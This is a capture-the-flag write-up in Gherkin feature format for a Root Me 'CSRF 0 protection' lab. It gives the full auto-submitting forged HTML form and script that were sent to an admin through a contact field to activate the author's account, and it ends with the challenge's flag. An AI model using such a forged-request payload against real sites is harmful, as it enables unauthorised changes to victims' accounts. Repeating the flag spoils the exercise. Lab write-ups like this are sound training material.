# Version 2.0
# language: en

Feature:  Web Client - Root Me
  Site:
     www.root-me.org
  Category:
    Web Client
  User:
    badwolf10
  Goal:
    Activate your account to access intranet

  Background:
  Hacker's software
    | <Software name>    |       <Version>      |
    | Windows            | 10.0.16299 (x64)     |
    | Mozilla Firefox    | 63.0                 |
    | Visual Studio Code | 1.29.1               |
  Machine information:
    Given I the challenge url
    """
    https://www.root-me.org/en/Challenges/Web-Client/CSRF-0-protection
    """
    And The challenge statement
    """
    Activate your account to access intranet
    """
    Then I am redirected to the challenge website
    """
    http://challenge01.root-me.org/web-client/ch22/
    """

  Scenario: Success: Activate Account
    Given the challenge website
    Then I create an account
    And I login to my account
    And I see four tabs : Contact, Profile, Private and Logout
    And I see the Profile tab has an unchecked, disabled checkbox
    And I see the form source code with the checkbox disabled
    """
    <input type="checkbox" name="status" disabled >
    """
    Then see in the Private tab the message
    """
    Your account has not been validated by an administrator, please wait.
    """
    Then I see in the Contact tab with two fields for email and message
    And I write a code to send the Profile form with the checkbox activated
    And I obtain the form source code of the Profile tab
    And I modify it to enable the checkbox
    And I also add an script to post the form to the server
    """
    <form id="hack" method="post" enctype="multipart/form-data"
    action="http://challenge01.root-me.org/web-client/ch22/?action=profile">
      <div class="form-group">
        <label>Username:</label>
        <input type="text" name="username" value="badwolf10">
      </div>
    <br>
      <div class="form-group">
        <label>Status:</label>
        <input type="checkbox" name="status" checked >
      </div>
    <br>
    <button type="submit">Submit</button>
    </form>
    <script>document.getElementById("hack").submit()</script>
    """
    And I submit the code in the Comment field with a fake email
    Then I logout and log back in
    And I go to the Private tab and i see the message
    """
    Good job dude, flag is : Csrf_Fr33style-L3v3l1!
    """
    And I solve the challenge
